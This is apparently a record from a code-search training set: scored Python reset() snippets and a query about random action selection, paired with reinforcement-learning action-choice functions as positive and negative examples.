[ "def reset (self):\n self.counter = 0", "def reset(self):\n self.counter = 0", "def reset(self):\n self.algo_state = {}\n self.actual_repetitions = 0\n self.next_session = -1\n self.last_session = -1\n self.past_quality = []", "def reset(self):\n self.test = 0\n self.hit = 0", "def reset(self):\n self.test = 0\n self.hit = 0", "def reset(self):\n self.test = 0\n self.hit = 0", "def reset(self):\n self.patterns = []\n self.number = -1", "def reset_counter(self) -> None:", "def reset():", "def reset():", "def reset():", "def reset_counter(self):\n self.counter = 0\n self.highlight_input()", "def reset_count(self):\n self.count = 0", "def reset(self):\n self.correct_count = 0\n self.total_count = 0", "def reset_search(self):\n self._state = IdleTracker._INITIAL_STATE\n self._scan_count = 0\n self._candidate_list = None", "def reset(*args):", "def reset(*args):", "def reset(*args):", "def reset(self):\n self.test = 0\n self.pos = 0", "def reset(self):\n self.test = 0\n self.pos = 0", "def reset(self):\n # reset Regions and counter\n for name in self.group.keys():\n self.group[name].reset()\n self.counter[name] = 0\n\n # reset to initial outbreak\n if name in self.initial_outbreak.keys():\n self.group[name].set_infected()\n self.counter[name] = self.initial_outbreak[name]\n\n if self.rng is not None:\n np.random.seed(self.rng)\n\n self.iter = 0\n self.end = False\n return", "def reset(self) -> None:\n self.current = 0\n self.num_cuts = 0", "def reset(self):\n self.total_pulls = 0\n self.total_score = 0\n self.npulls = np.zeros(self.k)\n self.score = np.zeros(self.k)", "def Reset(self):\n self._results = []", "def _reset_count(self):\n self._triple_count = 0\n self._error_count = 0\n self._ignored_count = 0", "def reset_stats(self):\r\n self.pepes_left = self.ai_settings.pepe_limit\r\n self.score = 0\r\n self.level = 1", "def reset():\r\n pass", "def reset(self):\n self.tot = 0\n self.cnt = [0.0 for _ in range( self.alpha.getLen() )]", "def reset(self):\n self.tracker.reset()\n self.total_max_q = 0.0\n self.episode_step = 0\n self.episode += 1", "def reset(self) -> None:\n self.best = self.mode_worse\n self.cooldown_counter = 0\n self.num_bad_epochs = 0", "def reset():\n\n global optimizer_data\n global optimizer_len\n\n optimizer_data = []\n optimizer_len = 0\n return", "def reset(self):\n self.avg = 0\n self.sum = 0\n self.cnt = 0", "def reset(self) -> None:\n self.true_positives = 0\n self.all_positives = 0", "def reset():\n pass", "def reset():\n pass", "def reset(self):\n self.loss = 0\n self.cnt = 0", "def reset(self):\n self.accumulation = None", "def reset(self):\n self.accumulation = None", "def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0", "def reset():\n global counter, total_attempts, successful_stops\n timer.stop()\n counter = 0\n total_attempts = 0\n successful_stops = 0", "def reset():\n global current, tries, wins\n current = 0\n tries = 0\n wins = 0\n timer.stop()", "def reset(self):\n self.damage_dealt = 0\n self.kills = 0\n self.got_killed = False\n self.fitness = 0", "def reset(self):\n self.liidx = 0\n self.clidx = 0", "def resetBot(self):\n self.state = [None, None, None, False]\n self.score = 0\n counts = {}\n for value in dnUtil.valuesList:\n counts[value] = self.calcDefaultCount(value)\n self.state[2] = counts", "def reset(self):\n for i in range(0, len(self.__counts)):\n self.__counts[i] = 0\n self.__overflow = 0\n self.__total_count = 0\n self.__total_values = 0\n self.__min = None\n self.__max = None", "def reset(self):", "def reset(self):", "def reset(self):", "def reset(self):", "def reset(self):\n self._accumulated_time.clear()\n self._hit_count.clear()", "def reset(self):\n self._total_value = 0.0\n self._count = 0", "def reset(self):\n self.count = 0\n self.soft = False\n self.can_double = True\n self.can_split = False\n self.first_card = 0", "def reset(self):\n ...", "def reset(self):\n ...", "def reset(self):\n for counterKey in self.counters.keys():\n self.counters[counterKey]=0\n self.title=None # 025 This is a hack of a hack. Trying to find if the counter was reset recently.", "def reset() -> None:\n ...", "def _reset(self) -> None:", "def _reset(self) -> None:", "def reset(self):\n self.fuzz_complete = False\n self.mutant_index = 0\n self.value = self.original_value", "def reset(self):\n self.num_inst = 0\n self.sum_metric = 0.0", "def reset(self) -> List[int]:", "def reset(self):\n self.restart()\n self.cycles = 0", "def __reset_pat(self):\n\t\tself.pat_it = iter(self.pat_array)", "def hard_reset() -> NoReturn:", "def _reset(self):", "def reset(self):\n self.sum_metric = 0.\n self.num_inst = 0.\n self.metrics.reset_stats()", "def reset(self):\n self.visited = False\n self.calculated = False\n self.past_value = self.value\n self.value = 0", "def reset(self) -> None:", "def reset(self) -> None:", "def reset(self) -> None:", "def reset(self):\n self._regex = None\n self._includes.clear()", "def reset() -> None:\n\t_flag.clear()", "def reset(self):\n self.reset_count += 1\n self._init_data()", "def reset(self):\n self.mode = 0\n self.graphs = [[], [], []]\n self.coefficients = []\n self.sample = []", "def reset_gensym_counter(val = 0, verbose = False):\n global counter\n if isinstance(val, int):\n counter = val\n else:\n counter = 0\n if verbose:\n print \"counter = {0}\".format(counter)", "def _reset(self):\n if self.mode not in ['auto', 'min', 'max']:\n warnings.warn('Learning Rate Plateau Reducing mode %s is unknown, '\n 'fallback to auto mode.' % (self.mode),\n RuntimeWarning)\n self.mode = 'auto'\n if (self.mode == 'min' or\n (self.mode == 'auto' and 'acc' not in self.monitor)):\n self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)\n self.best = np.Inf\n else:\n self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)\n self.best = -np.Inf\n self.cooldown_counter = 0\n self.wait = 0", "def __reset(self):\n\t\tself.__highest = -float('inf')\n\t\tself.__lowest = float('inf')\n\t\tself.__total = 0\n\t\tself.__steps = 0\n\t\tself.__cold_days = 0", "def clear(self):\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator.clear()\n self.global_ap_calculator.clear()\n self.num_examples = 0", "def reset(self):\n self.best_res = -1\n self.best_epoch = self.ignore_before", "def reset(self):\n self.dynamic_predictions = {}\n self.position = 0\n self.references = []", "def _reset(self):\n if self.mode not in ['auto', 'min', 'max']:\n logging.warning('Learning Rate Plateau Reducing mode %s is unknown, '\n 'fallback to auto mode.', self.mode)\n self.mode = 'auto'\n if (self.mode == 'min' or\n (self.mode == 'auto' and 'acc' not in self.monitor)):\n self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)\n self.best = np.Inf\n else:\n self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)\n self.best = -np.Inf\n self.cooldown_counter = 0\n self.wait = 0", "def reset(self):\n \n pass", "def reset():\n global current, tries, wins, winstreak, losestreak, mood, scorepos\n global p1score, p1ws, p1ls, p1mood, p2score, p2ws, p2ls, p2mood\n global p1scorepos, p2scorepos, result2pline, result2p\n \n current = 0\n tries = 0\n wins = 0\n winstreak = 0\n losestreak = 0\n mood = \"#FFF8DC\"\n scorepos = (250, 140)\n \n p1score = 0\n p1ws = 0\n p1ls = 0\n p1mood = \"#FFF8DC\"\n p1scorepos = (132,510)\n p2score = 0\n p2ws = 0\n p2ls = 0\n p2mood = \"#FFF8DC\"\n p2scorepos = (426,510)\n result2pline = 0.1\n result2p = \"\"\n \n timer.stop()", "def reset() -> None:\n Parameter.by_name = {}", "def reset(self) -> None:\n self.counterpoint = self.counterpoint[0:1]\n self.__initialize_piano_roll()\n self.__set_defaults_to_runtime_variables()", "def reset(self):\n self._idx = 0", "def reset(self, *args, **kwargs):", "def reset(self):\n self.score = None\n self.true = None\n self.meta = None", "def reset_counter(self) -> None:\n self._fail_counter = 0", "def reset(self):\n self.last_round = False\n self.last_player = None\n self.scores = [0] * self.num_players\n self.current_player = 0\n self.turn = 0\n self.roll = None", "def reset(self):\n self.kw_func = {**self.default_func}\n self.kw_var = {}\n self.kw_lines = []\n self.status_listener = None\n self.line_count = 0\n self.case_id = 0\n if self.run_signal:\n self.run_signal.stop = False\n self._have_record_res = False", "def reset(self):\n self.j = 1", "def reset(self):\n self._proportional = 0\n self._integral = 0\n self._derivative = 0\n\n self._last_time = self._current_time()\n self._last_output = None\n self._last_input = None", "def reset_for_new_run(\n self,\n state: State\n ):\n\n super().reset_for_new_run(state)\n\n self.epsilon = self.original_epsilon\n self.greedy_action = list(self.Q.keys())[0]", "def reset(self):\n self.start_times = {}\n self.stats = defaultdict(OnlineMeter) # float defaults to 0", "def reset(self) -> None:\n ...", "def reset(self) -> None:\n ...", "def reset(self) -> None:\n ...", "def reset(self) -> None:\n ...", "def reset(self) -> None:\n ..." ]
[ "0.706285", "0.70557153", "0.69341266", "0.6901927", "0.6901927", "0.6901927", "0.68682015", "0.6837828", "0.6697244", "0.6697244", "0.6697244", "0.6695066", "0.66831166", "0.66431034", "0.66348666", "0.65636104", "0.65636104", "0.65636104", "0.64995754", "0.64995754", "0.6499308", "0.64559764", "0.64407086", "0.64265853", "0.64010334", "0.63687086", "0.6368072", "0.6361042", "0.6354115", "0.6350978", "0.631896", "0.6312897", "0.62936455", "0.62835777", "0.62835777", "0.6278311", "0.6274558", "0.6274558", "0.62664825", "0.6260231", "0.62445354", "0.62432104", "0.62422067", "0.6240466", "0.6235344", "0.6229096", "0.6229096", "0.6229096", "0.6229096", "0.6208337", "0.6201614", "0.62001926", "0.61973095", "0.61973095", "0.6194502", "0.619119", "0.6186905", "0.6186905", "0.6183116", "0.6181953", "0.61796194", "0.61733615", "0.61632806", "0.6161568", "0.6160631", "0.61413586", "0.61200726", "0.6115911", "0.6115911", "0.6115911", "0.61152494", "0.61117256", "0.6110397", "0.6108705", "0.6098651", "0.6097482", "0.6095224", "0.6095083", "0.6093475", "0.6092413", "0.6090039", "0.60832804", "0.6080569", "0.60711384", "0.6065354", "0.6062416", "0.6052866", "0.6048436", "0.6048279", "0.6041745", "0.60356736", "0.6028849", "0.60158896", "0.60150236", "0.6014362", "0.6013531", "0.6013531", "0.6013531", "0.6013531", "0.6013531" ]
0.69747984
2
Policy that selects one of the available actions at random
def random_action(self, action_list=None): # sample from all actions if action_list is None: return np.random.choice(self.actions) # sample from a subset of actions else: return np.random.choice(action_list)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getAction(self, state):\n # Pick Action\n legalActions = self.getLegalActions(state)\n action = None\n \"*** YOUR CODE HERE ***\"\n # util.raiseNotDefined()\n if random.random() < self.epsilon:\n action = random.choice(legalActions)\n else:\n action = self.getPolicy(state)\n return action", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n ''' \n You should change this in your own agent.\n '''\n\n return random.choice(actions)", "def choose_random_action(env):\n return env.action_space.sample()", "def _choose_action(self):\n return random.randint(0,self.num_bandits-1)", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n '''\n You should change this in your own agent.\n '''\n\n return random.choice(actions)", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n '''\n You should change this in your own agent.\n '''\n\n return random.choice(actions)", "def choose_action(self, state):\n\n return self.policy(state).sample()", "def RandomAgentProgram(actions):\n return lambda percept: random.choice(actions)", "def RandomAgentProgram(actions):\n return lambda percept: random.choice(actions)", "def _select_action(self, state):\n if random.random() < self.epsilon:\n action = random.randrange(self.num_actions)\n return torch.tensor([[action]], device=device, dtype=torch.long)\n else:\n with torch.no_grad():\n return self.policy_net(state).max(1)[1].view(1, 1)", "def getAction(self, state):\n # Pick Action\n legalActions = self.getLegalActions(state)\n action = None\n\n \"\"\"Description:\n Use util.flipCoin, if return true then randomly choice from legalAction\n if flase, then sue getPolicy to get best policy action\n \"\"\"\n \"\"\" YOUR CODE HERE \"\"\"\n if len(legalActions) == 0:\n return action # None\n \n if util.flipCoin(self.epsilon):\n ''' exploration function (not work well)''' \n# posPol = util.Counter()\n# for a in legalActions:\n# if self.getQValue(state,a) >= 0:\n# posPol[a] = -1*self.getQValue(state, a) + (1000/(self.vitCount[(state,a)]+0.0001))\n# #print \"posPol[\", a, \"]= \",posPol[a]\n# #posPol[a] = (self.getQValue(state, a) * self.epsilon** self.vitCount[(state,a)]) + ( self.epsilon/(self.vitCount[(state,a)]+0.1) )\n# if len(posPol) == 0:\n# action = random.choice(legalActions)\n# else:\n# action = posPol.argMax() # random.choice(posPol.keys())\n ''' Random exploration '''\n action = random.choice(legalActions)\n else:\n action = self.getPolicy(state)\n \n \"\"\" END CODE \"\"\"\n\n return action", "def select_action(self, **kwargs):\n return np.random.randint(0, self.num_actions)", "def pick_action(self, available_actions, epsilon=.05):\n if np.random.uniform(0, 1) < epsilon:\n action = available_actions[np.random.randint(\n 0, len(available_actions))]\n else:\n q_values_of_state = self.q_table[self.environment.current_location]\n maxValue = max(q_values_of_state.values())\n action = np.random.choice(\n [k for k, v in q_values_of_state.items() if v == maxValue]\n )\n\n return action", "def act(observation):\n current_policy = sess.run(policy, {observation_: [observation]})\n action = np.random.choice(action_size, p=current_policy[0])\n return action", "def choose_action(self):\n\n def is_random_exploration():\n\n # 5. Return whether do random choice\n # hint: generate a random number, and compare\n # it with epsilon\n if random.random() < self.epsilon:\n return True\n else:\n return False\n\n final_action = ''\n if self.learning:\n if is_random_exploration():\n # 6. Return random choose aciton\n final_action = self.valid_actions[random.randint(0, 3)]\n else:\n # 7. Return action with highest q value\n final_action = max(\n self.Qtable[self.state].items(),\n key=operator.itemgetter(1))[0]\n elif self.testing:\n # 7. choose action with highest q value\n final_action = max(\n self.Qtable[self.state].items(),\n key=operator.itemgetter(1))[0]\n else:\n # 6. Return random choose aciton\n final_action = self.valid_actions[random.randint(0, 3)]\n\n return final_action", "def _select_action(self):\n if self.eval_mode:\n self._log_values()\n epsilon = self.epsilon_eval\n else:\n epsilon = self.epsilon_fn(\n self.epsilon_decay_period,\n self.training_steps,\n self.min_replay_history,\n self.epsilon_train)\n if random.random() <= epsilon:\n # Choose a random action with probability epsilon.\n return random.randint(0, self.num_actions - 1)\n else:\n # Choose the action with highest Q-value at the current state according\n # to the current head.\n return self._compute_q_argmax()", "def choose_action(self, board, possible_actions):\r\n return np.random.choice(possible_actions)", "def choose_random_action(self):\r\n return Action.HIT if random.random() <= 0.5 else Action.STICK", "def randomAction():\n return np.random.randint(0, POSSIBLE_ACTIONS)", "def choose_random_action(all_actions: int) -> int:\n return np.random.randint(all_actions)", "def choose_action(self, state):\n prob = [] # Probability distribution\n for i in range(len(ACTIONS)):\n prob.append(self.epsilon/4)\n Q_func = self.policy.predict(process_state(state))\n Q_vals = Q_func[0]\n max_index = []\n Qmax = np.amax(Q_vals)\n for i in range(len(prob)):\n if Q_vals[i] == Qmax:\n # max_index.append(i)\n prob[i] = 1 - self.epsilon + self.epsilon/4\n break\n # ind = np.random.choice(max_index)\n # prob[ind] = 1 - self.epsilon + self.epsilon/4\n action = np.random.choice(ACTIONS, p = prob)\n return action", "def __call__(self, num_actions):\n return np.random.choice(num_actions)", "def get_action(self, state):\n time.sleep(2.0)\n return random.choice(state.get_legal_actions(self.index))", "def _select_action(self):\n if self.eval_mode:\n epsilon = self.epsilon_eval\n else:\n epsilon = self.epsilon_fn(\n self.epsilon_decay_period,\n self.training_steps,\n self.min_replay_history,\n self.epsilon_train)\n if random.random() <= epsilon:\n # Choose a random action with probability epsilon.\n return random.randint(0, self.num_actions - 1)\n else:\n # Choose the action with highest Q-value at the current state.\n if self._interact == 'stochastic':\n selected_action = self._stochastic_action\n elif self._interact == 'greedy':\n selected_action = self._q_argmax\n else:\n raise ValueError('Undefined interaction')\n return self._sess.run(selected_action,\n {self.state_ph: self.state})", "def select_action(self, state):\r\n policy_s = self.epsilon_greedy_probs(self.nA, self.Q[state], self.count, self.epsilon)\r\n return np.random.choice(np.arange(self.nA), p=policy_s)", "def chooseAction(self,state):\r\n #generate float btwn 0-1\r\n choice = random.random()\r\n \r\n #choose according to that number\r\n if choice > self.epsilon:\r\n return(self.maxQ(state)[1])\r\n else:\r\n #choose randomly\r\n return(self.actions[random.randrange(0,len(self.actions))])", "def chooseAction(self,state):\r\n #generate float btwn 0-1\r\n choice = random.random()\r\n \r\n #choose according to that number\r\n if choice > self.epsilon:\r\n return(self.maxQ(state)[1])\r\n else:\r\n #choose randomly\r\n return(self.actions[random.randrange(0,len(self.actions))])", "def chooseAction(self,state):\r\n #generate float btwn 0-1\r\n choice = random.random()\r\n feat = self.feat_funct(state)\r\n #choose according to that number\r\n if choice > self.epsilon:\r\n return(self.maxQ(feat)[1])\r\n else:\r\n #choose randomly\r\n return(self.actions[random.randrange(0,len(self.actions))])", "def get_action(self, state):\n return random.choice(state.get_legal_actions(self.index))", "def selectAction(self, state, require_q=False):\n e = self.exploration.value(self.steps_done)\n self.steps_done += 1\n q_values = self.forwardPolicyNet(state)\n if random.random() > e:\n action = q_values.max(1)[1].view(1, 1)\n else:\n if hasattr(self.env, 'nA'):\n action_space = self.env.nA\n else:\n action_space = self.env.action_space.n\n action = torch.tensor([[random.randrange(action_space)]], device=self.device, dtype=torch.long)\n q_value = q_values.gather(1, action).item()\n if require_q:\n return action, q_value\n return action", "def policy(self):\r\n actions = self.domain.get_actions()\r\n # Random policy (please uncomment the following line to test it, and comment the \"always accelerate\" policy)\r\n #index = random.randint(0, 1)\r\n # \"Always accelerate\" policy\r\n index = 1\r\n return actions[index]", "def sample(self, action):\n selector = random.random()\n return 1 if selector <= self.pay_offs[action] else 0", "def select_action(policy_net, state, eps, n_actions, device, steps_done):\n sample = random.random()\n if sample > eps:\n with torch.no_grad():\n # t.max(1) will return largest column value of each row\n # second column on max result is index of where max element was\n # found, so we pick action with the larger expected reward\n return torch.tensor([[policy_net.forward(state.float()).argmax()]], device=device,\n dtype=torch.long)\n else:\n return torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long)", "def select_action(state, policy, model, num_actions,\n EPS_START, EPS_END, EPS_DECAY, steps_done, alpha, beta):\n # sample = random.random()\n # eps_threshold = EPS_END + (EPS_START - EPS_END) * \\\n # math.exp(-1. * steps_done / EPS_DECAY)\n # .data.max(1)[1].view(1, 1)\n # if sample <= eps_threshold:\n # return LongTensor([[random.randrange(num_actions)]])\n\n\n \n Q = model(Variable(state, volatile=True).type(FloatTensor))\n pi0 = policy(Variable(state, volatile=True).type(FloatTensor))\n # print(pi0.data.numpy())\n V = torch.log((torch.pow(pi0, alpha) * torch.exp(beta * Q)).sum(1) ) / beta\n \n #### FOUND ERROR: ( Q ) returns a tensor of nan at some point\n if np.isnan( Q.sum(1).data[0]) :\n print(\"Q = \", Q)\n print(\"state = \", state)\n\n pi_i = torch.pow(pi0, alpha) * torch.exp(beta * (Q - V))\n m = Categorical(pi_i)\n action = m.sample().data.view(1, 1)\n return action\n # numpy.random.choice(numpy.arange(0, num_actions), p=probabilities)", "def select_action(self):\n estimated_q_a = self._action_value_estimator.get_estimated_q_a()\n\n if np.random.rand() < self._epsilon:\n chosen_action = random.choice(list(estimated_q_a.keys()))\n else:\n chosen_action = max(estimated_q_a, key=estimated_q_a.get)\n\n return chosen_action", "def policy_action(self, s):\n return np.random.choice(np.arange(self.act_dim), 1, p=self.actor.predict(s).ravel())[0]", "def chooseAction(self, gameState):\n\n ####print \"chooseAction Called\"\n\n #self.lastEatenFood = None\n\n\n actions = gameState.getLegalActions(self.index)\n\n ##print \"\\nNEW ACTION\\n--------\"\n\n # You can profile your evaluation time by uncommenting these lines\n # start = time.time()\n values = [self.evaluate(gameState, a) for a in actions]\n # ###print 'eval time for agent %d: %.4f' % (self.index, time.time() - start)\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n \n\n return random.choice(bestActions)", "def select_action(self, state, evaluate=False):\n random_action = torch.tensor(random.randint(0,self.env.nA-1))\n return random_action", "def sample_action(self, state):\n # YOUR CODE HERE\n \n action = np.random.choice(1)\n \n \n return action", "def select_action(self, state):\n\t\treturn sample(range(0, self.action_space), 1)[0]", "def pick_random_action(self):\n\n actions = [self.delete_first_connection, self.delete_last_connection, self.add_connection_beginning, self.add_connection_ending]\n action = random.choice(actions)\n return action", "def get_random_action():\n # Define an array containing the available actions for the UAV\n # in the final work, takeoff and land must be added\n action_list = ['left', 'right', 'forward', 'backward', 'stop', 'descend']\n # Choose a random action within the array\n #action_index = STDrandom.randint(0, len(action_list) - 1)\n # forward,backward,left,right, stop and land\n probability_descend = 0.25\n probability = (1 - probability_descend)/ (len(action_list) -1)\n action_probability = [probability, probability, probability, probability, probability, probability_descend]\n action = np.random.choice(action_list, 1, p=action_probability)[0]\n #action_index = STDrandom.randint(0, 10)\n #action = action_list[action_index]\n\n return action", "def choose_action(self):\r\n pass", "def decision():\n return random.choice(['GoToNormal','GoToSleep'])", "def sample_action(policy, state):\n nS, nA = policy.shape\n all_actions = np.arange(nA)\n return np.random.choice(all_actions, p=policy[state])", "def select_action(self, state):\n\n if state in self.Q:\n prob = self.get_probs(self.Q[state])\n else:\n prob = np.ones(self.nA) / self.nA\n return np.random.choice(np.arange(self.nA), p = prob)", "def start_step_policy(self, observation):\n log.info(\"Random action\")\n _ = observation\n action = self.env.action_space.sample()\n return action", "def chooseAction(self, gameState):\n\n actions = gameState.getLegalActions(self.index)\n\n action_choose = uct_for_pacman(gameState, self)\n if action_choose not in actions:\n return random.choice(actions)\n print(\"此步来自UCT\")\n self.action_last = action_choose\n return action_choose", "def __sample_policy_action(probs):\n # Subtract a tiny value from probabilities in order to avoid\n # \"ValueError: sum(pvals[:-1]) > 1.0\" in numpy.multinomial\n probs = probs - np.finfo(np.float32).epsneg\n\n action_indexes = [int(np.nonzero(np.random.multinomial(1, p))[0]) for p in probs]\n############################################################################################\n # action_indexes = [np.argmax(p) for p in probs] #select the action with the highest probability instead of randomly sampling\n # print(action_indexes)\n # print('++++++++++++++++++++++++')\n############################################################################################\n return action_indexes", "def chooseAction(self, gameState):\n\n actions = gameState.getLegalActions(self.index)\n obs = gameState.getAgentDistances()\n for o in self.opponents:\n self.observe(o, obs[o], gameState)\n self.displayDistributionsOverPositions(self.distributions)\n\n # You can profile your evaluation time by uncommenting these lines\n start = time.time()\n values = [self.evaluate(gameState, a) for a in actions]\n print 'eval time for agent %d: %.4f' % (self.index, time.time() - start)\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n #self.elapseTime(gameState)\n\n return random.choice(bestActions)", "def random_choice(self, actions=None, random_state=None):\n random_state = check_random_state(random_state)\n\n if actions is not None:\n n = len(actions)\n else:\n n = self.num_actions\n\n if n == 1:\n idx = 0\n else:\n idx = rng_integers(random_state, n)\n\n if actions is not None:\n return actions[idx]\n else:\n return idx", "def sample_action(q_pi, policies, num_controls, action_selection=\"deterministic\", alpha = 16.0):\n\n num_factors = len(num_controls)\n\n action_marginals = utils.obj_array_zeros(num_controls)\n \n # weight each action according to its integrated posterior probability over policies and timesteps\n for pol_idx, policy in enumerate(policies):\n for t in range(policy.shape[0]):\n for factor_i, action_i in enumerate(policy[t, :]):\n action_marginals[factor_i][action_i] += q_pi[pol_idx]\n \n selected_policy = np.zeros(num_factors)\n for factor_i in range(num_factors):\n\n # Either you do this:\n if action_selection == 'deterministic':\n selected_policy[factor_i] = np.argmax(action_marginals[factor_i])\n elif action_selection == 'stochastic':\n p_actions = softmax(action_marginals[factor_i] * alpha)\n selected_policy[factor_i] = utils.sample(p_actions)\n\n return selected_policy", "def choose_action(self, state):\n if random.random() < self.epsilon:\n self.epsilon -= self.epsilon_annealing_rate\n return random.choice(self.valid_actions)\n \n #initialize search variables\n opt_action = self.valid_actions[0]\n opt_value = 0\n\n #performs a search across all valid actions for highest q-value.\n for action in self.valid_actions:\n cur_value = self.q_value(state, action)\n if cur_value > opt_value:\n opt_action = action\n opt_value = cur_value\n elif cur_value == opt_value:\n opt_action = random.choice([opt_action, action])\n return opt_action", "def random_action(self, observation):\n return self.env.action_space.sample()", "def best_action(self, state):\n return random.choice(self.possible_actions)", "def choose_action(self, observation):\n observation = observation[np.newaxis, :]\n \n prob_weights = self.sess.run(\n self.all_act_prob,\n feed_dict={self.tf_obs: observation})\n\n action = npr.choice(range(prob_weights.shape[1]), p=prob_weights.ravel())\n\n return action", "def _take_action(self, action):\n # Get transition probabilities for all potential next state values\n trans_probs = self.transition_probabilities[self.cur_state, action]\n\n # Generate an array of next state options to choose from\n next_state_options = np.linspace(0, self.n_states-1, self.n_states,\n dtype=int)\n\n # Sample from new state options based on the transition probabilities\n new_state = np.random.choice(next_state_options, p=trans_probs)\n\n return new_state", "def select_action(self, state: str) -> Action:\n rnd_num = self._random.random()\n p = 1.0 - self.epsilon\n if rnd_num > p:\n action = self._random.random_choice() \n else:\n action = max(self.Qs[state], key=lambda x: self.Qs[state][x])\n if self.epsilon_decay == True:\n self.turns += 1\n if self.turns < self.end_epsilon_decay:\n self.epsilon -= self.decay_value \n return action", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n # You can profile your evaluation time by uncommenting these lines\n # start = time.time()\n values = [self.evaluate(gameState, a) for a in actions]\n # print 'eval time for agent %d: %.4f' % (self.index, time.time() - start)\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n return random.choice(bestActions)", "def sample_action(self, state, timestep, explore_prob):\r\n\r\n if np.random.random() < explore_prob:\r\n return np.random.uniform(*self.bounds, size=(self.action_size,))\r\n return self.action_select_eval(self.model, state, timestep)[0].detach()", "def get_random_action(self) -> ActionType:\n return self.action_space.sample()", "def chooseAction(self, gameState):\n\n return \"Stop\"\n\n actions = gameState.getLegalActions(self.index)\n\n return random.choice(actions)", "def __call__(self, state):\n if random.random() > self._epsilon:\n return self._max_policy(state)\n return random.choice(np.arange(self._action_size))", "def select_action(self, state):\n if state in self.Q:\n action = np.random.choice(np.arange(self.nA), p=self.get_probs(self.Q[state], self.epsilon, self.nA))\n else :\n action = np.random.choice(self.nA)\n\n return action", "def act(self, state):\r\n self.state_info, actions= self.env.generatePossibleAction(state)\r\n # import pdb; pdb.set_trace()\r\n # print(actions)\r\n if self.eps > 0. and np.random.rand() < self.eps:\r\n # select the action randomly\r\n return random.choice(actions)\r\n # import pdb; pdb.set_trace()\r\n qvals = {action: self.Q_value[self.state_info, action] for action in actions}\r\n max_q = max(qvals.values())\r\n\r\n # in case of multiple actions having the same Q values\r\n actions_with_max_q = [a for a,q in qvals.items() if q == max_q]\r\n return random.choice(actions_with_max_q)", "def select_action(self, state):\n # print(\"agent.select_action() - state: {}\".format(state))\n\n self.step_counter += 1\n # self.epsilon = max(0.1, 1.0-self.step_counter/self.epsilon_decay_steps)\n epsilon_min = .01\n epsilon_max = .8\n epsilon_step = epsilon_max - (epsilon_max - epsilon_min) * self.step_counter / self.epsilon_decay_steps\n self.epsilon = max(epsilon_min, epsilon_step)\n # self.epsilon = max(0.1, 1.0/self.step_counter)\n\n rand = random.uniform(0, 1)\n if rand < self.epsilon:\n # choose random action\n return np.random.choice(self.nA)\n else:\n # choose greedy action\n return np.argmax(self.Q[state])", "def select_action(policy, state):\n #torch.manual_seed(RAND_SEED) # Seed here is causing kernel to crash\n state = torch.from_numpy(state).long().unsqueeze(0)\n state = torch.zeros(3,9).scatter_(0,state,1).view(1,27)\n #print(state) # for 2b\n pr = policy(Variable(state))\n #print(pr) # for 2c\n m = torch.distributions.Categorical(pr)\n action = m.sample()\n log_prob = torch.sum(m.log_prob(action))\n return action.data[0], log_prob", "def chooseAction(self, gameState):\n\n actions = gameState.getLegalActions(self.index)\n\n values = [self.evaluate(gameState, a) for a in actions]\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n return random.choice(bestActions)", "def select_action(self, state):\n \n ##create lists and string to save relative action information\n actions = []\n action = ''\n all_actions = []\n \n ##get the action with the maximum value\n temp = {}\n for (s, a), value in self.Q.iteritems():\n if s == state:\n temp[(s, a)] = value\n all_actions.append(a) \n max_value = max(temp.values())\n for (s, a) , value in temp.iteritems():\n if value == max_value:\n actions.append(a)\n\n ##if we have more than one action with max_values, random return one\n if len(actions) > 1:\n index = random.randint(0,len(actions) - 1)\n action = str(actions[index])\n else:\n for item in actions:\n action = item\n \n ##when the random number less than epsilon, then return one action randomly \n if random.random() < self.epsilon:\n index = random.randint(0, len(all_actions) - 1)\n action = str(all_actions[index])\n \n ##if the random number not less than epsilon, then return the action with max value\n return action", "def select_action(self, state):\n \n ##create lists and string to save relative action information\n actions = []\n action = ''\n all_actions = []\n \n ##get the action with the maximum value\n temp = {}\n for (s, a), value in self.Q.iteritems():\n if s == state:\n temp[(s, a)] = value\n all_actions.append(a)\n \n max_value = max(temp.values())\n for (s, a) , value in temp.iteritems():\n if value == max_value:\n actions.append(a)\n\n ##if we have more than one action with max_values, random return one\n if len(actions) > 1:\n index = random.randint(0,len(actions) - 1)\n action = str(actions[index])\n else:\n for item in actions:\n action = item\n \n ##when the random number less than epsilon, then return one action randomly \n if random.random() < self.epsilon:\n index = random.randint(0, len(all_actions) - 1)\n action = str(all_actions[index])\n \n ##if the random number not less than epsilon, then return the action with max value\n return action", "def choose_action(self, obs, **kwargs):\n pass", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n # You can profile your evaluation time by uncommenting these lines\n # start = time.time()\n values = [self.evaluate(gameState, a) for a in actions]\n # print 'eval time for agent %d: %.4f' % (self.index, time.time() - start)\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n foodLeft = len(self.getFood(gameState).asList())\n\n return random.choice(bestActions)", "def toggle_random_action(self):\n if self.performing_random_actions:\n if self.action_count < self.random_action_count and self.previous_action is not None:\n action = self.previous_action\n else:\n # switch to non-random\n action = Action(has_control=False)\n self.action_count = 0\n self.performing_random_actions = False\n else:\n if self.action_count < self.non_random_action_count and self.previous_action is not None:\n action = self.previous_action\n else:\n # switch to random\n steering = np.random.uniform(-0.5, 0.5, 1)[0] # Going too large here gets us stuck\n log.debug('random steering %f', steering)\n throttle = 0.65 # TODO: Make throttle random to get better variation here\n action = Action(steering, throttle)\n self.action_count = 0\n self.performing_random_actions = True\n return action", 